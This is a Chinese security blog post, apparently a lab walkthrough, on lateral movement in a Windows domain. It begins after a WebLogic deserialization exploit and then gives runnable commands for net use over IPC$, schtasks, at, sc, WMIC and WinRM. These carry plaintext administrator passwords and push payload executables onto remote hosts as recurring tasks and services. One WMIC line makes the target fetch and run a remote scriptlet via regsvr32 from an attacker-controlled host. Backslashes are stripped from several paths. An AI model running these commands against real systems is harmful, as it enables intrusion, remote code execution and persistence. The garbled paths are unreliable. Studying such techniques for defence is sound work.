横向移动

  • A+
所属分类:安全博客

/01 IPC+Schtasks

一,IPC$简介

IPC$ (Internet Process Connection) 是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,通 过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程 计算机的访问。

二,利用条件

  1. 开发端口139,445端口
  2. 目标开启IPC$文件共享服务
  3. 需要目标机器的管理员账号和密码

依旧是前期的信息收集:知道WEB一个IP进行nmap探测对方开放端口

横向移动

开发了7001可能是weblogin:

横向移动

老版本的weblogin11g,尝试下反序列化: CVE-2019-2725

横向移动

再将payload转移到CS上面hashdump,msf的获取域内shell:getsystem有点问题(后来证实payload选择windows/x64/meter,而不是windows/meter)。cs就很好用使用payload_injured模块

横向移动

得到了密码下面就可以进行横向移动了。

先进行内网探测

探测出有10.10.10.201和10.10.10.80

三,常用命令

1.连接

1
net use \10.10.10.201ipc$ /user:administrator "!QAZ2wsx"

横向移动

2.查看连接情况

1
net use

横向移动

3.查看目标主机时间

1
net time \10.10.10.201

横向移动

4.删除连接

1
net use \10.10.10.201ipc$ /del

横向移动

5.文件上传下载

1
2
copy shell.exe \10.10.10.201c$windowstempplugin_update.exe
copy \10.10.10.201c$59.exe c:

四,Schtasks

允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划任务 /Create 创建新计划任务。

/Delete 删除计划任务。

/Query 显示所有计划任务。

/Change 更改计划任务属性。

/Run 按需运行计划任务。

/End 中止当前正在运行的计划任务。

/ShowSid 显示与计划的任务名称相应的安全标识符。

/? 显示此帮助消息。

五,IPC+Schtasks

net连接

1
net use \10.10.10.201ipc$ /user:administrator "!QAZ2wsx"

查看c盘目录

1
dir \10.10.10.201c$

横向移动

Copy上传文件

1
copy c:windowstemp808888.exe \10.10.10.201c$

横向移动

Schtasks定制周期任务

1
schtasks /create /s 10.10.10.201 /u de1ayadministrator /p "!QAZ2wsx" /sc MINUTE /mo 1 /tn test2 /tr "c:1288888.exe"

横向移动

横向移动

Schtasks删除周期任务

1
schtasks /delete /s 10.10.10.201 /tn test2

横向移动

meterpreter拿到的shell执行这个不知道为什么会卡住

六,IPC+AT

net连接

1
net use \10.10.10.201ipc$ /user:administrator "!QAZ2wsx"

横向移动

at

1
2
net time \10.10.10.201
at \10.10.10.201 19:08 c:8088888.exe

横向移动

横向移动

横向移动

但是在powershell里运行就很成功就很奇妙了

横向移动

横向移动

注意:at 在windows server 2012等新版系统中已被弃用

/02 IPC+SC

net连接

1
net use \10.10.10.201ipc$ /user:administrator "!QAZ2wsx"

sc创建服务执行

1
2
3
sc \10.10.10.201 create test3 binpath= "c:808888.exe" obj= "de1ayadministrator" password= "!QAZ2wsx"

sc \10.10.10.201 start test3

这种传教服务和reg创建服务格式都是binpath= “”等号后面有个空格

横向移动

横向移动

删除

1
sc \10.10.10.201 qc test

横向移动

横向移动

/03 WMIC

1
wmic /node:10.10.10.201 /user:administrator /password:[email protected] process call create "regsvr32 /s /n /u /i:http://192.168.78.128:8080/feY7nzY.sct scrobj.dll"

由于我设置了PC处于内网不能访问192.168.78.128只能访问10.10.10.0/24所以就不能这么实现了,上马方式就是regsvr32去运行我们网站上的getshell。

process all create 创建一个进程(process进程管理)

wmic命令缺点是没有回显,可以使用wmiexec.vbs脚本实现回显。

1
wmic /node:10.10.10.201 /user:administrator /password:!QAZ2wsx process call create "cmd /c calc.exe"

横向移动

ProcessID为创建进程的PID,

所以内网环境中比较建议使用上传马的把calc换成我们的马。

/04 WinRM

一,WinRM简介

WinRM 指的是Windows远程管理服务,通过远程连接winRM模块可以操作windows命令行,默认监听端口 5985(HTTP)&5986 (HTTPS),在2012及以后默认开启。

二,开启WinRM

判断是否开启WinRM服务

1
winrm enumerate winrm/config/listener

横向移动

命令开启WinRM服务:

1
winrm quickconfig

横向移动

环境问题(lll¬ω¬)在我的反复调试,百般爱护下终于好了

横向移动

横向移动

允许远程主机访问及访问远程主机

1
winrm set winrm/config/client @{TrustedHosts="*"}

横向移动

横向移动

三,Winrs执行命令

1
winrs -r:http://10.10.10.201:5985 -u:administrator -p:!QAZ2wsx ipconfig

横向移动

横向移动

四,WinRM横向移动

利用winrm参数选项中的invoke参数,来对目标对象执行特定的方法。

1
winrm invoke create wmicimv2/win32_process @{Commandline="calc.exe"} 

横向移动

命令调用了Windows WMI中Win32_process类的Create方法,生成了一个calc.exe的新进程

横向移动

在远程机器上打开进程

1
winrm invoke create wmicimv2/win32_process @{Commandline="calc.exe"} -r:http://10.10.10.201:5985 -u:administrator -p:!QAZ2wsx

横向移动

在远程机器上创建服务

1
winrm invoke Create wmicimv2/Win32_Service @{Name="test5";DisplayName="test5";PathName="cmd.exe /k c:1288888.exe"} -r:http://10.10.10.201:5985 -u:administrator -p:!QAZ2wsx

横向移动

在远程机器上启动服务

1
winrm invoke StartService wmicimv2/Win32_Service?Name=test -r:http://10.10.10.201:5985 -u:administrator -p:!QAZ2wsx

横向移动

FROM :https://ailumao.cn/ | Author:Ailumao

相关推荐: 如何挖掘UPnP服务漏洞-入门篇

本文首发于xray社区:https://mp.weixin.qq.com/s/VK5CiWa5IIiMMwf–26miA 周末测了一下屋里的几个iot设备,顺便学习了一下对于UPnP的服务如何去挖掘漏洞。这里记录一下UPnP的学习笔记。 UPnP UPnP是因…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: